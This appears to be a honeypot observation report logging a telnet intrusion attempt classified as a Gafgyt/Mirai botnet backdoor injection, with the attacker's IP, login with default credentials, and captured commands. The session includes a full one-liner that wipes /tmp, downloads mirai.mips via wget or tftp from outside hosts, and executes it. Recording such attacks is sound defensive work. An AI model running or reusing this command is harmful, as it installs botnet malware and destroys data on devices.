Attack Report for Observation

Header

Time

2024/08/28, 16:50:16 (GMT)

Transaction ID

SFD4ATG73T6NWS8Y

Service

telnet

Location

RU (Russia)

Attacker

185.254.190.173

Classification

Gafgyt.c botnet

Harm Potential

High

Description

Linux gafgyt.c botnet backdoor injection

Content

185.254.190.173:44124 is connected to telnet server
login:
support

Password:
support

OK
TSrv >
cat | sh

ERROR : Unrecognized command
TSrv >
sh

ERROR : Unrecognized command
TSrv >
cd /tmp; rm -rf *; wget http://84.32.190.32/bins/mirai.mips || tftp -r mirai.mips -g 185.65.245.234 || tftp 185.65.245.234 -g mirai.mips; cat mirai.mips > dvrHelper; chmod +x dvrHelper; ./dvrHelper; rm -rf dvrHelper

ERROR : Unrecognized command
TSrv >
185.254.190.173:44124 is disconnected

All observations are coming from honeypot central database.

Please share your wishes, opinions and suggestions with us:

If you like, you can support
with your donations to us..

Donate